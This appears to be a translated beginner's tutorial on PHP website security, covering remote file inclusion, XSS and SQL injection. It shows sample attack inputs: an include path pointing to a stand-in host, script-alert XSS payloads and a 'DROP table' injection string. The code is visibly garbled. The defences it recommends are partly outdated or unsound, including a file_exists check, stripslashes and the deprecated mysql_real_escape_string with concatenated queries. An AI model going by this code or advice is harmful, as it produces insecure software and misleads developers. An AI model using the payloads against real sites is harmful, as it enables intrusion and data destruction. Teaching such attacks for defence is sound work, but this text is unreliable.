The second lesson that PHP programmers must learn--prevention of website security

As a PHP programmer, the first lesson we learned is the basic syntax. So what should we learn after we are familiar with basic grammar? I think it's a safety issue. Security is based on a Web site like a cornerstone, a careless, means a catastrophic accident.

The main point here is to mention three of the simplest, but also the most important security issues. I'll make a supplement later.

1. Include

Sometimes, we may include a file based on the user's input, such as

Include $filename. ' PHP '

So if my $filename is a connection to an external website, such as Http://www.hack.com/hack, it will undoubtedly lead to security breaches.

So when writing this include statement, we must first determine if the file exists locally.

if (file_exists ($filename. ' php '))    include $filename. ' PHP '

2. XSS Injection

XSS injection, the cross-site scripting injection, refers to a script statement that the user adds similar to <script> alert ("I m hacking") </script> in the input.

Common points that can be attacked by XSS include

2.1$_server[' Php_self ']

Instance:

<form method= "POST" action= "<?php echo $_server[" php_self "];? > ">

If the user enters the URL as

Http://www.example.com/test_form.php/%22%3E%3Cscript%3Ealert (' hacked ')%3c/script%3e

The contents of the form will then become:

<form method= "POST" action= "test_form.php"/><script>alert (' hacked ') </script>

Then it executes the JS code that is added later.

2.2 Input in form Add script statement

If you add a script statement to a form that fills in the content. If we do not do the processing, but also on the Web page with Echo Direct output will be in our web page, so for the data submitted from the form, we also have to do some processing.

Instance:

<form method= "POST" action= "test_form.php"/><input name= "text" type= "text"/></form>

If I enter <script>alert (' hacked ') in the input box </script> and if the contents of our input box are displayed on the page, then the script will be executed.

2.2 Processing methods

To prevent such attacks, we can use a function in PHP--Htmlspecialchars (), which converts special characters into HTML entities. This means that HTML characters such as < and > are replaced with &lt; and &gt; In addition we can also use 1

1. (via the PHP trim () function) remove unnecessary characters from user input data (extra spaces, tabs, line breaks)
2. (via PHP stripslashes () function) remove backslash (\) from user input data

3. SQL injection

The main approach to attack is to add injected SQL statements to the form input.

such as the following login form

<form method= "POST" action= "test_form.php"/><input name= "id" type= "text"/><input name= "password" type = "Password"/></form>

If I enter name in the ID box; DROP table *, and I used the "select from user where id=" in background processing. $id;

The SQL statement will then become

Select from user where Id=name;drop table *;

Then all the data tables are deleted. Therefore, it is particularly important to prevent SQL injection.

Processing method:

PHP has a special function mysql_real_escape_string ($sql); It is able to escape special characters in SQL statements.

For the input box to submit data, if it involves database operations, we need to use the above function processing.

Instance:

$user = mysql_real_escape_string ($user); $pwd = mysql_real_escape_string ($pwd); $sql = "SELECT * from Users whereuser= '". $user. "' and password= '". $pwd. "'"

The second lesson that PHP programmers must learn--prevention of website security